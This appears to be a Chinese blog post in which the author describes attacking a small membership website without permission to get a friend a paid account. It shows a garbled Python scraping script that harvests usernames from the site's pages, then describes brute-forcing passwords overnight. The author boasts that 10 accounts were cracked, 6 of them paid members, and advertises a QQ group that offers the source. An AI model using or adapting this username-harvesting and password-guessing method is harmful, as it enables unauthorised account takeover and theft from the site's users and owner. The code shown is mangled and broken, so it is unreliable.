暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。
只要用户名和密码不同,其他的不变
python 模拟登录
这部分就比较简单,用到requests模块
得到用户名
这部分主要用到正则模块匹配就行了
importreimportrequestsdefgethtml(url): headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0','Referer':'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'} html = requests.get(url, headers=headers)returnhtml.textfori in range(30,36):ifi ==1: url ='http:/XXXXXX.com/'else: url ='http://XXXXXXX.com/page/'+ str(i) html = gethtml(url)foreachin re.findall('(.*?):', gethtml(each)):if'href'in each2: each2 = re.findall("class='url'>(.*?)", each2)[0] f = open('yonghu.txt','a+',encoding='utf-8') f.write(each2) f.write('\n') f.close()print(each2)
得到用户名保存在yonghu.txt文件里
开始爆破
本来想加上多线程,但因为网站太垃圾了,访问过快会限制,那就算了吧。。。
运行效果图
收获
放在服务器上跑了一晚,爆出来10个账号,其中6个充值了会员,美吱吱
进群:125240963 即可获取源码!
网友评论